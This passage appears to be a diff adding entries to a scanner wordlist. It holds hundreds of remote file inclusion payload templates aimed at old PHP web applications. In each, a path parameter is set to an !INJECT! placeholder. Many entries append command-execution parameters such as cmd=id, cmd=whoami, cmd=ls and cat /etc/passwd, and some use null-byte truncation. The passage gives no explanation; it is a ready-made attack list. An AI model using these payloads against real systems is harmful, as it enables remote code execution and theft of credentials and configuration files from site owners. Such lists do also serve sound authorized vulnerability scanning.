+/plugins/polls/functions.inc?_CONF[path]=!INJECT!
+/plugins/rss_importer_functions.php?sitepath=!INJECT!?
+/plugins/safehtml/HTMLSax3.php?dir[plugins]=!INJECT!?
+/plugins/safehtml/safehtml.php?dir[plugins]=!INJECT!?
+/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=!INJECT!
+/plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=!INJECT!
+/plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=!INJECT!
+/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=!INJECT!
+/plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=!INJECT!
+/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=!INJECT!
+/plugins/spamx/Import.Admin.class.php?_CONF[path]=!INJECT!
+/plugins/spamx/LogView.Admin.class.php?_CONF[path]=!INJECT!
+/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=!INJECT!
+/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=!INJECT!
+/plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=!INJECT!
+/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=!INJECT!
+/plugins/staticpages/functions.inc?_CONF[path]=!INJECT!
+/plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=!INJECT!
+/plume-1.1.3/manager/tools/link/dbinstall.php?cmd=ls&_PX_config[manager_path]=!INJECT!
+/plus.php?_pages_dir=!INJECT!?
+/pmapper-3.2-beta3/incphp/globals.php?_SESSION[PM_INCPHP]=!INJECT!?
+/pmi_v28/Includes/global.inc.php?strIncludePrefix=!INJECT!
+/pmi_v28/Includes/global.inc.php?strIncludePrefix=!INJECT!?
+/podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=!INJECT!
+/podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=!INJECT!
+/podcastgen1.0beta2/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=!INJECT!
+/podcastgen1.0beta2/core/admin/categories_add.php?absoluteurl=!INJECT!
+/podcastgen1.0beta2/core/admin/categories_remove.php?absoluteurl=!INJECT!
+/podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=!INJECT!
+/podcastgen1.0beta2/core/admin/editdel.php?p=admin&absoluteurl=!INJECT!
+/podcastgen1.0beta2/core/admin/ftpfeature.php?p=admin&absoluteurl=!INJECT!
+/podcastgen1.0beta2/core/admin/login.php?absoluteurl=!INJECT!
+/podcastgen1.0beta2/core/admin/pgRSSnews.php?absoluteurl=!INJECT!
+/podcastgen1.0beta2/core/admin/showcat.php?absoluteurl=!INJECT!
+/podcastgen1.0beta2/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl=!INJECT!
+/podcastgen1.0beta2/core/archive_cat.php?absoluteurl=!INJECT!
+/podcastgen1.0beta2/core/archive_nocat.php?absoluteurl=!INJECT!
+/podcastgen1.0beta2/core/recent_list.php?absoluteurl=!INJECT!
+/poll/view.php?int_path=!INJECT!
+/pollvote.php?pollname=!INJECT!?&cmd=ls
+/pop.php?base=!INJECT!
+/popup_window.php?site_isp_root=!INJECT!?
+/port.php?content=!INJECT!
+/portal/includes/portal_block.php?phpbb_root_path=!INJECT!
+/portal/portal.php?phpbb_root_path=!INJECT!?
+/portfolio.php?id=!INJECT!
+/portfolio/commentaires/derniers_commentaires.php?rep=!INJECT!?
+/post_static_0-11/_lib/fckeditor/upload_config.php?DDS=!INJECT!
+/prepare.php?xcart_dir=!INJECT!?
+/prepend.php?_PX_config[manager_path]=!INJECT!
+/preview.php?php_script_path=!INJECT!?&cmd=dir
+/principal.php?conteudo=!INJECT!
+/print.php?page=!INJECT!
+/print.php?pager=!INJECT!
+/print.php?print=!INJECT!?
+/process.php?DEFAULT_SKIN=!INJECT!
+/professeurs/index.php?repertoire_config=!INJECT!
+/profil.php?config[root_ordner]=!INJECT!?&cmd=id
+/projects/weatimages/demo/index.php?ini[langpack]=!INJECT!
+/promocms/newspublish/include.php?path[bdocroot]=!INJECT!
+/protection.php?logout_page=!INJECT!?
+/provider/auth.php?xcart_dir=!INJECT!?
+/psynch/nph-psa.exe?css=!INJECT!
+/psynch/nph-psf.exe?css=!INJECT!
+/public_html/add-ons/modules/sysmanager/plugins/install.plugin.php?AURORA_MODULES_FOLDER=!INJECT!?
+/public_html/modules/Forums/favorites.php?nuke_bb_root_path=!INJECT!?
+/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=!INJECT!
+/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=!INJECT!
+/qsgen_0.7.2c/qlib/smarty.inc.php?CONFIG[gameroot]=!INJECT!?
+/qsgen_0.7.2c/server_request.php?CONFIG[gameroot]=!INJECT!?
+/qte_web.php?qte_web_path=!INJECT!?
+/quick_reply.php?phpbb_root_path=!INJECT!&mode=[file]
+/quickie.php?QUICK_PATH=!INJECT!?&cmd=id
+/random2.php?path_to_folder=!INJECT!
+/randshop/index.php?incl=!INJECT!?
+/rdf.php?page[path]=!INJECT!?&cmd=ls
+/reactivate.php?base_dir=!INJECT!
+/read.php?data=!INJECT!?
+/readmore.php?config["sipssys"]=!INJECT!
+/recent.php?insPath=!INJECT!
+/rechnung.php?_PHPLIB[libdir]=!INJECT!?
+/reconfig.php?GLOBALS[CLPath]=!INJECT!
+/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=!INJECT!
+/redirect.php?url=!INJECT!
+/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=!INJECT!
+/register.php?base_dir=!INJECT!
+/releasenote.php?mosConfig_absolute_path=!INJECT!
+/rempass.php?lang=!INJECT!
+/report.php?scriptpath=!INJECT!?
+/reports/who_r.php?bj=!INJECT!
+/resources/includes/class.Smarty.php?cfg[sys][base_path]=!INJECT!
+/ressourcen/dbopen.php?home=!INJECT!?
+/robotstats.inc.php?DOCUMENT_ROOT=!INJECT!?
+/root/public/code/cp_html2txt.php?page=!INJECT!
+/routines/fieldValidation.php?jssShopFileSystem=!INJECT!
+/rspa/framework/Controller_v4.php?__ClassPath=!INJECT!
+/rspa/framework/Controller_v4.php?__ClassPath=!INJECT!?
+/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=!INJECT!
+/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=!INJECT!?
+/rss.php?page[path]=!INJECT!?&cmd=ls
+/rss.php?phpraid_dir=!INJECT!
+/rss.php?premodDir=!INJECT!
+/rss2.php?page[path]=!INJECT!?&cmd=ls
+/run.php?dir=SHELL?&file=!INJECT!
+/s01.php?shopid=!INJECT!
+/s01.php?shopid=!INJECT!?
+/s02.php?shopid=!INJECT!?
+/s03.php?shopid=!INJECT!?
+/s04.php?shopid=!INJECT!?
+/sablonlar/gunaysoft/gunaysoft.php?icerikyolu=!INJECT!
+/sablonlar/gunaysoft/gunaysoft.php?sayfaid=!INJECT!
+/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=!INJECT!
+/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=!INJECT!?
+/sample/xls2mysql/parser_path=!INJECT!?
+/save.php?file_save=!INJECT!
+/saveserver.php?thisdir=!INJECT!
+/script//ident/index.php?path_inc=!INJECT!
+/script/_conf/core/common-tpl-vars.php?confdir=!INJECT!?
+/script/common.inc.php?path_inc=!INJECT!
+/script/gestion/index.php?path_inc=!INJECT!
+/script/ident/disconnect.php?path_inc=!INJECT!
+/script/ident/ident.inc.php?path_inc=!INJECT!
+/script/ident/identification.php?path_inc=!INJECT!
+/script/ident/loginliste.php?path_inc=!INJECT!
+/script/ident/loginmodif.php?path_inc=!INJECT!
+/script/index.php?path_inc=!INJECT!
+/script/init/createallimagecache.php?PATH_TO_CODE=!INJECT!
+/script/menu/menuadministration.php?path_inc=!INJECT!
+/script/menu/menuprincipal.php?path_inc=!INJECT!
+/script/param/param.inc.php?path_inc=!INJECT!
+/script/plugins/phpgacl/admin/index.php?path_inc=!INJECT!
+/script/template/index.php?main_page_directory=!INJECT!
+/script/tick/allincludefortick.php?PATH_TO_CODE=!INJECT!
+/script/tick/test.php?PATH_TO_CODE=!INJECT!
+/script_path/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=!INJECT!?
+/script_path/cms/classes/openengine/filepool.php?oe_classpath=!INJECT!?
+/script_path/installation/index.php?mosConfig_absolute_path=!INJECT!?
+/script_path/pgvnuke/pgvindex.php?DOCUMENT_ROOT/header.php=!INJECT!
+/scripts/check-lom.php?ETCDIR=!INJECT!
+/scripts/gallery.scr.php?GLOBALS[PTH][func]=!INJECT!?
+/scripts/lom_update.php?ETCDIR=!INJECT!
+/scripts/news.scr.php?GLOBALS[PTH][classes]=!INJECT!?
+/scripts/polls.scr.php?GLOBALS[PTH][classes]=!INJECT!?
+/scripts/rss.scr.php?GLOBALS[PTH][classes]=!INJECT!?
+/scripts/search.scr.php?GLOBALS[PTH][classes]=!INJECT!?
+/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=!INJECT!
+/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=!INJECT!?
+/scripts/weigh_keywords.php?ETCDIR=!INJECT!
+/scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=!INJECT!?
+/search.php?config["sipssys"]=!INJECT!
+/search.php?id=!INJECT!
+/search.php?insPath=!INJECT!
+/search/submit.php?config["sipssys"]=!INJECT!
+/search_wA.php?LIBPATH=!INJECT!
+/searchbot.php?path=!INJECT!
+/security/include/_class.security.php?PHPSECURITYADMIN_PATH=!INJECT!
+/sendstudio/admin/includes/createemails.inc.php?ROOTDIR=!INJECT!?
+/sendstudio/admin/includes/send_emails.inc.php?ROOTDIR=!INJECT!?
+/senetman/html/index.php?page=!INJECT!
+/services.php?page=!INJECT!
+/services/samples/inclusionService.php?CabronServiceFolder=!INJECT!%00
+/settings.php?P[includes]=!INJECT!
+/settings_sql.php?path=!INJECT!
+/setup/inc/database.php?tcms_administer_site=!INJECT!
+/setup/upgrader.php?RootDirectory=!INJECT!
+/sezhoo/SezHooTabsAndActions.php?IP=!INJECT!
+/shop/includes/header.inc.php?dateiPfad=!INJECT!
+/shop/index.php?action=!INJECT!?&cmd=cat%20config.php
+/shop/page.php?osCsid=!INJECT!?
+/shop/page.php?pageid=!INJECT!?
+/shoutbox.php?language=!INJECT!
+/shoutbox.php?root=!INJECT!?cmd=id
+/show.php?file=!INJECT!
+/show.php?id=!INJECT!
+/show.php?page=!INJECT!
+/show.php?path=!INJECT!
+/show_archives.php?cutepath=!INJECT!?
+/sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=!INJECT!
+/sid=!INJECT!
+/signer/final.php?smiley=!INJECT!?
+/signin.php?sent=1&AMG_serverpath=!INJECT!
+/sinagb.php?fuss=!INJECT!
+/sinapis.php?fuss=!INJECT!
+/sitebar/Integrator.php?file=!INJECT!
+/sitebar/index.php?writerFile=!INJECT!
+/sitebuilder/admin/top.php?admindir=!INJECT!
+/sitemap.xml.php?dir[classes]=!INJECT!
+/skin/board/default/doctype.php?dir=!INJECT!
+/skin/dark/template.php?path=!INJECT!
+/skin/gold/template.php?path=!INJECT!
+/skin/html/table.php?pachtofile=!INJECT!
+/skin/original/template.php?path=!INJECT!
+/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=!INJECT!
+/skins/advanced/advanced1.php?pluginpath[0]=!INJECT!
+/skins/default.php?dir_inc=!INJECT!
+/skins/header.php?ote_home=!INJECT!
+/skins/phpchess/layout_admin_cfg.php?Root_Path=!INJECT!
+/skins/phpchess/layout_cfg.php?Root_Path=!INJECT!
+/skins/phpchess/layout_t_top.php?Root_Path=!INJECT!
+/skysilver/login.tpl.php?theme=!INJECT!?
+/slogin_lib.inc.php?slogin_path=!INJECT!?
+/smarty.php?xcart_dir=!INJECT!?
+/smarty/smarty_class.php?_smarty_compile_path=!INJECT!
+/smilies.php?config=!INJECT!
+/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=!INJECT!?
+/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=!INJECT!?
+/snort/base_stat_common.php?BASE_path=!INJECT!
+/social_game_play.php?path=!INJECT!?
+/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=!INJECT!
+/song.php?phpbb_root_path=!INJECT!
+/source.php?bibtexrootrel=!INJECT!?
+/source/mod/rss/channeledit.php?Codebase=!INJECT!
+/source/mod/rss/post.php?Codebase=!INJECT!
+/source/mod/rss/view.php?Codebase=!INJECT!
+/source/mod/rss/viewitem.php?Codebase=!INJECT!
+/sources/Admin/admin_cats.php?CONFIG[main_path]=!INJECT!
+/sources/Admin/admin_edit.php?CONFIG[main_path]=!INJECT!
+/sources/Admin/admin_import.php?CONFIG[main_path]=!INJECT!
+/sources/Admin/admin_templates.php?CONFIG[main_path]=!INJECT!
+/sources/functions.php?CONFIG[main_path]=!INJECT!
+/sources/help.php?CONFIG[main_path]=!INJECT!
+/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=!INJECT!
+/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=!INJECT!
+/sources/mail.php?CONFIG[main_path]=!INJECT!
+/sources/misc/new_day.php?path=!INJECT!
+/sources/news.php?CONFIG[main_path]=!INJECT!
+/sources/post.php?fil_config=!INJECT!
+/sources/template.php?CONFIG[main_path]=!INJECT!
+/sources/tourney/index.php?page=!INJECT!?
+/spaw/spaw_control.class.php?GLOBALS[spaw_root]=!INJECT!
+/spaw/spaw_control.class.php?spaw_root=!INJECT!
+/speedberg/include/entrancePage.tpl.php?SPEEDBERG_PATH=!INJECT!
+/speedberg/include/generalToolBox.tlb.php?SPEEDBERG_PATH=!INJECT!
+/speedberg/include/myToolBox.tlb.php?SPEEDBERG_PATH=!INJECT!
+/speedberg/include/scriplet.inc.php?SPEEDBERG_PATH=!INJECT!
+/speedberg/include/simplePage.tpl.php?SPEEDBERG_PATH=!INJECT!
+/speedberg/include/speedberg.class.php?SPEEDBERG_PATH=!INJECT!
+/speedberg/include/standardPage.tpl.php?SPEEDBERG_PATH=!INJECT!
+/spellcheckwindowframeset.php?SpellIncPath=!INJECT!
+/squirrelcart/cart_content.php?cart_isp_root=!INJECT!
+/src/ark_inc.php?cfg_pear_path=!INJECT!?
+/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=!INJECT!
+/src/scripture.php?pageHeaderFile=!INJECT!?
+/starnet/themes/c-sky/main.inc.php?cmsdir=!INJECT!?
+/start.php?lang=!INJECT!
+/start.php?pg=!INJECT!
+/stat_modules/users_age/module.php?phpbb_root_path=!INJECT!
+/stats.php?vwar_root=!INJECT!
+/stphpapplication.php?STPHPLIB_DIR=!INJECT!
+/stphpbtnimage.php?STPHPLIB_DIR=!INJECT!
+/stphpform.php?STPHPLIB_DIR=!INJECT!
+/str.php?p=!INJECT!
+/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=!INJECT!
+/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=!INJECT!?
+/strload.php?LangFile=!INJECT!
+/studip-1.3.0-2/studip-htdocs/archiv_assi.php?cmd=ls%20-al&ABSOLUTE_PATH_STUDIP=!INJECT!?
+/studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls%20-al&_PHPLIB[libdir]=!INJECT!?
+/styles.php?toroot=!INJECT!
+/styles/default/global_header.php?installed=23&domain=!INJECT!
+/submit_abuse.php?path_prefix=!INJECT!
+/submit_comment.php?path_prefix=!INJECT!
+/subscp.php?phpbb_root_path=!INJECT!?
+/suite/index.php?pg=!INJECT!?
+/supasite/admin_auth_cookies.php?supa[db_path]=!INJECT!
+/supasite/admin_mods.php?supa[db_path]=!INJECT!
+/supasite/admin_news.php?supa[db_path]=!INJECT!
+/supasite/admin_settings.php?supa[include_path]=!INJECT!
+/supasite/admin_topics.php?supa[db_path]=!INJECT!
+/supasite/admin_users.php?supa[db_path]=!INJECT!
+/supasite/admin_utilities.php?supa[db_path]=!INJECT!
+/supasite/backend_site.php?supa[include_path]=!INJECT!
+/supasite/common_functions.php?supa[db_path]=!INJECT!
+/supasite/site_comment.php?supa[db_path]=!INJECT!
+/supasite/site_news.php?supa[db_path]=!INJECT!
+/support/include/open_form.php?include_dir=!INJECT!?cmd=pwd
+/support/index.php?main=!INJECT!
+/surveys/survey.inc.php?path=!INJECT!
+/sw/lib_comment/comment.php?doc_directory=!INJECT!?
+/sw/lib_find/find.php?doc_directory=!INJECT!?
+/sw/lib_session/session.php?doc_directory=!INJECT!?
+/sw/lib_up_file/file.php?doc_directory=!INJECT!?
+/sw/lib_up_file/find_file.php?doc_directory=!INJECT!?
+/sw/lib_user/find_user.php?doc_directory=!INJECT!?
+/sw/lib_user/user.php?doc_directory=!INJECT!?
+/sys/code/box.inc.php?config["sipssys"]=!INJECT!
+/system/ImageImageMagick.php?glConf[path_system]=!INJECT!?
+/system/_b/contentFiles/gBIndex.php?gBRootPath=!INJECT!?
+/system/admin/include/item_main.php?GLOBALS=!INJECT!
+/system/admin/include/upload_form.php?GLOBALS=!INJECT!
+/system/command/admin.cmd.php?GLOBALS=!INJECT!
+/system/command/download.cmd.php?GLOBALS=!INJECT!
+/system/funcs/xkurl.php?PEARPATH=!INJECT!
+/system/includes/pageheaderdefault.inc.php?_sysSessionPath=!INJECT!
+/system/login.php?site_path=!INJECT!
+/tagit2b/tagmin/delTagUser.php?configpath=!INJECT!?
+/tags.php?BBCodeFile=!INJECT!
+/taxonservice.php?dir=!INJECT!?
+/teatro/pub/pub08_comments.php?basePath=!INJECT!
+/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=!INJECT!?
+/template.php?actionsPage=!INJECT!?
+/template.php?blog_theme=!INJECT!
+/template.php?pagina=!INJECT!
+/template/Noir/index.php?site_path=!INJECT!
+/template/Vert/index.php?pageAll=!INJECT!
+/template/Vert/index.php?site_path=!INJECT!
+/template/barnraiser_01/p_new_password.tpl.php?templatePath=!INJECT!
+/template/default/footer.php?ROOT_PATH=!INJECT!?cmd=ls
+/template/default/test/header.php?ROOT_PATH=!INJECT!?cmd=ls
+/template/gwb/user_bottom.php?config[template_path]=!INJECT!
+/template/purpletech/base_include.php?page=!INJECT!?
+/template/rwb/user_bottom.php?config[template_path]=!INJECT!
+/template_csv.php?rInfo[content]=!INJECT!
+/templates/2blue/bodyTemplate.php?serverPath=!INJECT!?
+/templates/Official/part_userprofile.php?template_path=!INJECT!
+/templates/barrel/template.tpl.php?renderer=!INJECT!
+/templates/barrel/template.tpl.php?renderer=!INJECT!?
+/templates/barry/template.tpl.php?renderer=!INJECT!
+/templates/be2004-2/index.php?mosConfig_absolute_path=!INJECT!
+/templates/datumVonDatumBis.inc.php?root=!INJECT!
+/templates/default/header.inc.php?menu=!INJECT!
+/templates/default/index_logged.php?main_loaded=1&cur_module=!INJECT!
+/templates/default/tpl_message.php?right_file=!INJECT!
+/templates/footer.inc.php?root=!INJECT!
+/templates/header.inc.php?root=!INJECT!
+/templates/mylook/template.tpl.php?renderer=!INJECT!
+/templates/oerdec/template.tpl.php?renderer=!INJECT!
+/templates/pb/language/lang_nl.php?temppath=!INJECT!
+/templates/penguin/template.tpl.php?renderer=!INJECT!
+/templates/sidebar/template.tpl.php?renderer=!INJECT!
+/templates/slashdot/template.tpl.php?renderer=!INJECT!
+/templates/stylesheets.php?root=!INJECT!
+/templates/text-only/template.tpl.php?renderer=!INJECT!
+/templates/tmpl_dfl/scripts/index.php?dir[inc]=!INJECT!
+/theme/breadcrumb.php?rootBase=!INJECT!?
+/theme/default.php?root=!INJECT!
+/theme/format.php?_page_content=!INJECT!?
+/theme/format.php?_page_css=!INJECT!?
+/theme/frames1.php?root=!INJECT!
+/theme/frames1_center.php?root=!INJECT!
+/theme/frames1_left.php?root=!INJECT!
+/theme/frames1_top.php?root=!INJECT!
+/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=!INJECT!
+/theme/settings.php?pfad_z=!INJECT!
+/theme/test1.php?root=!INJECT!
+/theme/test2.php?root=!INJECT!
+/theme/test3.php?root=!INJECT!
+/theme/test4.php?root=!INJECT!
+/theme/test5.php?root=!INJECT!
+/theme/test6.php?root=!INJECT!
+/themes.php?GLOBALS[theme_path]=!INJECT!?
+/themes/blackorange.php?root=!INJECT!
+/themes/container.php?theme_directory=!INJECT!%00
+/themes/default/layouts/standard.php?page_include=!INJECT!?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
+/themes/default/preview_post_completo.php?dir=!INJECT!
+/themes/header.php?theme_directory=!INJECT!%00
+/themes/ubb/login.php?theme=!INJECT!
+/themes/ubb/login.php?theme=!INJECT!?
+/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=!INJECT!
+/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=!INJECT!
+/timedifference.php?la=!INJECT!
+/toolbar.loudmouth.php?mainframe=!INJECT!
+/tools/update_translations.php?_SESSION[path]=!INJECT!?
+/top.php?laypath=!INJECT!
+/toplist.php?f=toplist_top10&phpbb_root_path=!INJECT!
+/topsites/index.php?page=!INJECT!?&
+/towels-0.1/src/scripture.php?pageHeaderFile=!INJECT!
+/track.php?path=!INJECT!
+/tsep/include/colorswitch.php?tsep_config[absPath]=!INJECT!?
+/ttCMS_path/lib/db/ez_sql.php?lib_path=!INJECT!
+/twebs/modules/misc/usermods.php?ROOT=!INJECT!
+/ubbt.inc.php?GLOBALS[thispath]=!INJECT!?
+/unavailable.php?bibtexrootrel=!INJECT!?
+/unsubs.php?scdir=!INJECT!
+/up.php?my[root]=!INJECT!
+/upload.php?save_path=!INJECT!?
+/upload/admin/frontpage_right.php?loadadminpage=!INJECT!?
+/upload/top.php?maindir=!INJECT!?
+/upload/xax/admin/modules/install_module.php?level=!INJECT!?
+/upload/xax/admin/patch/index.php?level=!INJECT!?
+/upload/xax/ossigeno/admin/install_module.php?level=!INJECT!?
+/upload/xax/ossigeno/admin/uninstall_module.php?level=!INJECT!?
+/upload_local.php?target=!INJECT!?
+/upload_multi.php?target=!INJECT!?
+/urlinn_includes/config.php?dir_ws=!INJECT!?
+/user.php?caselist[bad_file.txt][path]=!INJECT!&command=cat%20/etc/passwd
+/user_language.php?INDM=r3d.w0rm&language_dir=!INJECT!?
+/user_new_2.php?home=!INJECT!
+/usr/extensions/get_calendar.inc.php?root_path=!INJECT!
+/usr/extensions/get_infochannel.inc.php?root_path=!INJECT!?cmd=id;pwd
+/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=!INJECT!
+/utilitaires/gestion_sondage.php?repertoire_visiteur=!INJECT!
+/utils/class_HTTPRetriever.php?libcurlemuinc=!INJECT!
+/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=!INJECT!
+/vCard/admin/define.inc.php?match=!INJECT!?&cmd=id
+/vb/includes/functions.php?classfile=!INJECT!
+/vb/includes/functions_cron.php?nextitem=!INJECT!
+/vb/includes/functions_forumdisplay.php?specialtemplates=!INJECT!
+/vbgsitemap/vbgsitemap-config.php?base=!INJECT!
+/vbgsitemap/vbgsitemap-vbseo.php?base=!INJECT!
+/vedit/editor/edit_htmlarea.php?highlighter=!INJECT!?
+/viart_cms-3.3.2/blocks/block_site_map.php?root_folder_path=!INJECT!?
+/view.php?ariadne=!INJECT!?
+/view.php?id=!INJECT!
+/view_func.php?i=!INJECT!&l=testfile.txt?
+/views/print/printbar.php?views_path=!INJECT!
+/visible_count_inc.php?statitpath=!INJECT!
+/visitor.php?_SERVER[DOCUMENT_ROOT]=!INJECT!??
+/volume.php?config[public_dir]=!INJECT!?
+/vote.php?Madoa=!INJECT!?
+/votebox.php?VoteBoxPath=!INJECT!
+/vp/configure.php?phpbb_root_path=!INJECT!?
+/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=!INJECT!
+/w-agora_path/add_user.php?bn_dir_default=!INJECT!?
+/w-agora_path/create_forum.php?bn_dir_default=!INJECT!?
+/w-agora_path/create_user.php?bn_dir_default=!INJECT!?
+/w-agora_path/delete_notes.php?bn_dir_default=!INJECT!?
+/w-agora_path/delete_user.php?bn_dir_default=!INJECT!?
+/w-agora_path/edit_forum.php?bn_dir_default=!INJECT!?
+/w-agora_path/mail_users.php?bn_dir_default=!INJECT!?
+/w-agora_path/moderate_notes.php?bn_dir_default=!INJECT!?
+/w-agora_path/reorder_forums.php?bn_dir_default=!INJECT!?
+/wamp_dir/setup/yesno.phtml?no_url=!INJECT!?
+/wapchat/src/eng.adCreate.php?sysFileDir=!INJECT!
+/wapchat/src/eng.adCreateSave.php?sysFileDir=!INJECT!
+/wapchat/src/eng.adDispByTypeOptions.php?sysFileDir=!INJECT!
+/wapchat/src/eng.createRoom.php?sysFileDir=!INJECT!
+/wapchat/src/eng.forward.php?sysFileDir=!INJECT!
+/wapchat/src/eng.pageLogout.php?sysFileDir=!INJECT!
+/wapchat/src/eng.resultMember.php?sysFileDir=!INJECT!
+/wapchat/src/eng.roomDeleteConfirm.php?sysFileDir=!INJECT!
+/wapchat/src/eng.saveNewRoom.php?sysFileDir=!INJECT!
+/wapchat/src/eng.searchMember.php?sysFileDir=!INJECT!
+/wapchat/src/eng.writeMsg.php?sysFileDir=!INJECT!
+/war.php?vwar_root=!INJECT!
+/warn.php?file=!INJECT!
+/watermark.php?GALLERY_BASEDIR=!INJECT!
+/wbxml/WBXML/Decoder.php?base_dir=!INJECT!
+/wbxml/WBXML/Encoder.php?base_dir=!INJECT!
+/web/Administration/Includes/configureText.php?path_prefix=!INJECT!
+/web/Administration/Includes/contentHome.php?path_prefix=!INJECT!
+/web/Administration/Includes/deleteContent.php?path_prefix=!INJECT!
+/web/Administration/Includes/deleteUser.php?path_prefix=!INJECT!
+/web/Administration/Includes/userHome.php?path_prefix=!INJECT!
+/web/BetaBlockModules//Module/Module.php?path_prefix=!INJECT!
+/web/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path!INJECT!
+/web/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=!INJECT!
+/web/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=!INJECT!
+/web/BetaBlockModules/EditProfileModule/external.php?path_prefix=!INJECT!
+/web/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix!INJECT!
+/web/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path!INJECT!
+/web/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=!INJECT!
+/web/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path!INJECT!
+/web/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/MyNetworksModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=!INJECT!
